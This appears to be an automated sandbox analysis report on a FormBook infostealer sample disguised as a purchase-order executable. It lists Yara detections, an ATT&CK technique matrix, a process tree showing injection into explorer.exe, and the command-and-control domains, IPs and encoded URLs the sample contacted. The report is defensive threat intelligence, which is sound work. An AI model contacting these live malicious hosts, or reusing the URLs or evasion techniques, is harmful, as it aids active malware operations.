            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PO_210223.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The matrix is listed per tactic (one column of the original grid per line). Bracketed numbers are the count badges attached to the technique in the original matrix; techniques without a badge are the grid's unmatched entries.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Scheduled Task/Job [1]; Shared Modules [1]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Scheduled Task/Job [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [612]; Scheduled Task/Job [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Rootkit [1]; Masquerading [1]; Virtualization/Sandbox Evasion [4]; Disable or Modify Tools [1]; Process Injection [612]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [4]; Software Packing [22]
Credential Access: Credential API Hooking [1]; Input Capture [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery [331]; Virtualization/Sandbox Evasion [4]; Process Discovery [2]; Remote System Discovery [1]; System Network Configuration Discovery [1]; File and Directory Discovery [1]; System Information Discovery [112]; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Credential API Hooking [1]; Input Capture [1]; Archive Collected Data [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

            Behavior Graph

Behavior Graph ID: 356494 | Sample: PO_210223.exe | Startdate: 23/02/2021 | Architecture: WINDOWS | Score: 100

The graph is rendered below as a process tree. Node numbers are the ones used in the original graph; a bracketed number after a process name is the count shown next to that node.

Start (node 2)
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 12 other signatures
  PO_210223.exe (node 10) [7], started
    Dropped files:
      C:\Users\user\AppData\Roaming\kwqifureL.exe, PE32
      C:\Users\...\kwqifureL.exe:Zone.Identifier, ASCII
      C:\Users\user\AppData\Local\...\tmp33D2.tmp, XML
      C:\Users\user\AppData\...\PO_210223.exe.log, ASCII
    Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    PO_210223.exe (node 14), started
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe (node 19), injected
        DNS/IP: www.pophazard.com 204.11.56.48, 49763, 80, CONFLUENCE-NETWORK-INCVG Virgin Islands (BRITISH); sll.nnu.pw 103.66.59.142, 49765, 80, CNSERVERSUS Hong Kong; 3 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        ipconfig.exe (node 25), started
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe (node 28) [1], started
            conhost.exe (node 30), started
    schtasks.exe (node 17) [1], started
      conhost.exe (node 23), started


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
PO_210223.exe | 31% | Virustotal |
PO_210223.exe | 43% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
PO_210223.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\kwqifureL.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\kwqifureL.exe | 43% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.PO_210223.exe.890000.0.unpack | 100% | Avira | HEUR/AGEN.1134873
9.2.PO_210223.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
kaieteurny.com | 0% | Virustotal |

            URLs


            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
kaieteurny.com | 23.229.197.103 | true | true | | unknown
sll.nnu.pw | 103.66.59.142 | true | true | | unknown
www.pophazard.com | 204.11.56.48 | true | true | | unknown
www.246835.com | unknown | unknown | true | | unknown
www.kaieteurny.com | unknown | unknown | true | | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.pophazard.com/ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb | true | Avira URL Cloud: safe | unknown
http://www.246835.com/ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb | true | Avira URL Cloud: safe | unknown
http://www.kaieteurny.com/ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb | true | Avira URL Cloud: safe | unknown
www.000666dy.com/ntg/ | true | Avira URL Cloud: safe | low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.com/designersGPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                      high
                      http://www.founder.com.cn/cnalPO_210223.exe, 00000000.00000003.647755183.0000000008255000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designers/?PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bThePO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eotipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designers?PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                          high
                          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otfipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.tiro.comexplorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fontbureau.com/designersexplorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                            high
                            http://www.goodfont.co.krPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttfipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.carterandcone.comPO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersQPO_210223.exe, 00000000.00000003.654377069.0000000008285000.00000004.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designersivaPO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmpfalse
                                high
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssPO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpfalse
                                  high
                                  http://i3.cdn-image.com/__media__/pics/12471/arrow.png)ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.sajatypeworks.comPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.typography.netDPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cn/cThePO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmPO_210223.exe, 00000000.00000003.655856986.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://fontfabrik.comPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fonts.comicPO_210223.exe, 00000000.00000003.645842271.000000000826B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://i3.cdn-image.com/__media__/pics/12471/libgh.png)ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://i3.cdn-image.com/__media__/pics/12471/logo.png)ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designersePO_210223.exe, 00000000.00000003.658906996.0000000008285000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.galapagosdesign.com/DPleasePO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.%s.comPAexplorer.exe, 0000000A.00000002.910436982.0000000002B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    low
                                    http://www.fonts.comPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.sandoll.co.krPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefixipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.urwpp.deDPleasePO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnPO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sakkal.comPO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.carterandcone.comigPO_210223.exe, 00000000.00000003.648155639.000000000828D000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.carterandcone.comva9yPO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.carterandcone.comcy | PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com | PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | false | - | high
http://i3.cdn-image.com/__media__/pics/12471/bodybg.png) | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.comc | PO_210223.exe, 00000000.00000003.645891455.000000000826B000.00000004.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://i3.cdn-image.com/__media__/pics/12471/search-icon.png) | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.comlic | PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comk | PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.founder.com.cn/cn/ | PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.zhongyicts.com.cniy | PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comint | PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn | PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.fontbureau.com/designers/frere-user.html | PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | false | - | high
http://i3.cdn-image.com/__media__/pics/12471/libg.png) | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.comal | PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.monotype. | PO_210223.exe, 00000000.00000003.658733903.0000000008285000.00000004.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.jiyu-kobo.co.jp/ | PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwW | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com8i | PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | false | - | high
http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.comh | PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2 | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnal9y | PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/ | PO_210223.exe, 00000000.00000003.652634958.0000000008285000.00000004.00000001.sdmp | false | - | high
